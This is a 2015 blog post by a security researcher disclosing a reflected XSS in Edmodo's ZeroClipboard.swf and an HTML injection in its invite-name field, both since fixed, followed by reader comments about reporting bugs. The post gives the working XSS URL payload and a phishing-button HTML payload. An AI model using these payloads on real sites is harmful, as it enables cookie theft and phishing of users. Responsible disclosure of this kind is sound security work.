David Sopas – Web Security Researcher

November 6, 2015 at 2:41 pm

Edmodo XSS and HTML Injection

Edmodo XSS and HTML Injection

For those who don’t know Edmodo

The safest and easiest way for educators to connect and collaborate with students, parents, and each other.

They count with 59,411,899 members. Huge number.

I decided to help them providing them with two security issues. A Reflected XSS and a HTML Injection.

#1 Reflected XSS

After registering in Edmodo I noticed a request to ZeroClipboard.swf on my Google Inspector.
I know that older versions of this SWF have a XSS vulnerability so I gave it a try:

https://www.edmodo.com/bin/ZeroClipboard.swf?id=\%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height

Guess what? It was vulnerable version. It worked perfecly and my cookie was shown in a Javascript alert box.

zero_xss

#2 HTML Injection on Create Invites

This was interesting and I already found similar issues on many websites.
Using the invitee_first_name field you could inject HTML to trick the victim [invitee_email].

Take for example this proof-of-concept:

Ze<br /><a href="http://www.davidsopas.com/poc/malware.htm" style="font-size:14px;text-decoration:none;margin:0 auto;background:#69a229;color:white;font-weight:400;border:1px solid #457a04;border-radius:4px;display:inline-block" target="_blank"><span style="display:inline-block;padding:10px 34px">Accept Invitation and Win a Bonus</span></a>

When sending a reminder you could also use the same technique:

<br /><a href="http://www.davidsopas.com/poc/malware.htm" style="font-size:14px;text-decoration:none;margin:0 auto;background:#69a229;color:white;font-weight:400;border:1px solid #457a04;border-radius:4px;display:inline-block" target="_blank"><span style="display:inline-block;padding:10px 34px">Accept Invitation and Win a Bonus</span></a>

This would reflect on the victims email. I used the same style of a existing Edmodo button. When the victim clicked, it goes to my proof-of-concept page.

Possible attack scenario:

  1. Malicious user sends invitations with a HTML injection [like my proof-of-concept]
  2. Victim thinks that’s a button from Edmodo and clicks on it.
  3. Victims browser gets hijacked

Edmodo guys were awesome, giving constantly updates on the report status. Also they sent me some goodies but European customs retain the package 🙂

Timeline:
13-10-2015 I sent a email request security contact
13-10-2015 Edmodo replied to the above question
13-10-2015 I sent the security report
22-10-2015 Edmodo replied that both issues were validated and they’re working on it
04-11-2015 Edmodo fixed both issues
06-11-2015 Full disclosure

0 likes Advisories # , ,
Share: / / /

6 thoughts on “Edmodo XSS and HTML Injection

  1. tbm says:

    thanks for the article,

    where is invitee_first_name field and how did you injected? couln’t see

    regards

    1. David Sopas says:

      In the textfield where you type that name of the user you want to invite for a group or something else.

  2. Paltry_Digger says:

    Does Edmodo have a place to contact them about vulnerabilities? I’ve also found something and am wondering where to report it.

    1. David Sopas says:

      @Paltry_Digger – privacy at edmodo.com. Hope it helps!

      1. Paltry_Digger says:

        Thanks! Just got my Edmodo mug and t-shirt for a stored XSS vulnerability 🙂

        1. David Sopas says:

          No worries. Edmodo are such cool guys 🙂

Leave a Reply

Your email address will not be published. Required fields are marked *